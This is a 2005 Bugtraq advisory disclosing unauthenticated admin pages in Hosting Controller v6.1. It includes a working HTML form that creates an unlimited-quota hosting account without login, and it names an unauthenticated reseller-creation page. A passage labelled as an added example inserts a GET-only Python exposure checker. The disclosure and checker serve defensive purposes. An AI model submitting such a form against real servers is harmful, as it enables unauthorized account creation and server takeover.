Message-ID: <20050711084647.8900.qmail@securityfocus.com>
Date: 11 Jul 2005 08:46:47 -0000
From: kehieuhoc@...oo.com
To: bugtraq@...urityfocus.com
Subject: Bug Hosting Controller New (v6.1 - Hotfix 2.1)


-= KeHieuHoc – HCE GROUP =-

Information
-------------------------
Software Package : Hosting Controller

Vendor Homepage : http://www.hostingcontroller.com

Platforms : Windows based servers

Vulnerability : Multiple missing authentication checks (administrative pages reachable without a login)

Risk : high

Vulnerable Versions: All versions (tested on v6.1 Hotfix 2.1)

Vendor Contacted : 09/07/2005

Release Date : 11/07/2005



Summary

------------

Hosting Controller is a complete array of Web hosting automation tools for
the Windows Server family platform.

(I)

A new hosting account can be created without authentication by posting to:

Exploit :

http://[target]/admin/hosting/addsubsite_online.asp

Code Form:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM> 



(II)

The reseller creation page, a function normally reserved for the system owner, is also reachable without authentication:

Exploit :

http://[target]/admin/hosting/dsp_newreseller.asp


(I) and (II) -> have fun 
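The following check is an added example, not part of the advisory and not Hosting Controller code. It probes the two pages named in (I) and (II) with a cookieless GET and reports whether the server serves the admin form to an anonymous client or bounces the request to a login. Only GET is used: the POST from the advisory's form would actually create an account, so the script encodes that body for inspection but never sends it. The input names checked for addsubsite_online.asp are taken from the form above; the marker for dsp_newreseller.asp, the "login" substring in a redirect target, and the use of 401/403 as a sign of a patched install are assumptions.

```python
"""Probe Hosting Controller admin pages for missing authentication (added example)."""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Pages named in the advisory, with the strings expected in the served HTML if
# the page is handed to an unauthenticated client.  The addsubsite input names
# come from the advisory's form; the reseller marker is an assumption.
ADMIN_PAGES = {
    "/admin/hosting/addsubsite_online.asp": ("domainname", "loginname"),
    "/admin/hosting/dsp_newreseller.asp": ("<form",),
}


def build_addsubsite_body(domain, login, password):
    """Encode exactly the fields the advisory's HTML form posts.

    Returned as a string for inspection only; nothing is sent."""
    fields = [
        ("domaintypecheck", "SECOND"),
        ("DomainName", domain),
        ("loginname", login),
        ("Quota", "-1"),
        ("htype", "27"),
        ("choice", "1"),
        ("password", password),
    ]
    return urllib.parse.urlencode(fields)


def classify_response(status, location, body, markers):
    """Map one HTTP response to 'protected', 'exposed' or 'unknown'.

    401/403, or a redirect whose Location mentions a login page, is treated as
    protected (assumption about a patched install).  A 200 whose body carries
    the page's own form markers means the admin page was served anonymously."""
    if status in (401, 403):
        return "protected"
    if status in (301, 302, 303, 307, 308):
        return "protected" if "login" in (location or "").lower() else "unknown"
    text = body.lower()
    if status == 200 and all(m in text for m in markers):
        return "exposed"
    return "unknown"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, timeout=10):
    """GET each admin page with no cookies; return {path: verdict}."""
    opener = urllib.request.build_opener(_NoRedirect)
    results = {}
    for path, markers in ADMIN_PAGES.items():
        req = urllib.request.Request(base_url.rstrip("/") + path,
                                     headers={"User-Agent": "hc-auth-check"})
        try:
            with opener.open(req, timeout=timeout) as resp:
                status, location = resp.status, resp.headers.get("Location")
                body = resp.read(65536).decode("latin-1", "replace")
        except urllib.error.HTTPError as err:
            status, location = err.code, err.headers.get("Location")
            body = err.read(65536).decode("latin-1", "replace")
        except urllib.error.URLError as err:
            results[path] = "error: %s" % err.reason
            continue
        results[path] = classify_response(status, location, body, markers)
    return results


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    for path, verdict in probe(target).items():
        print(path, verdict)
```

Run it as `python hc_check.py http://[target]`; an "exposed" verdict on either path means the page answered an anonymous request with its form, which is the condition the advisory describes. Redirects are deliberately not followed so that a bounce to a login page is visible as the evidence of a working authentication check.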

 
 


Solution

----------



The vendor was notified and has released a patch.

Update your software.



Credits

---------

Discovered on 9 July 2005 by KeHieuHoc – HCE Group


Email: kehieuhoc@...oo.com

 

References

-------------



http://hcegroup.net

 

------------------------------ //  KeHieuHoc – HCE Group \\ ------------------------------

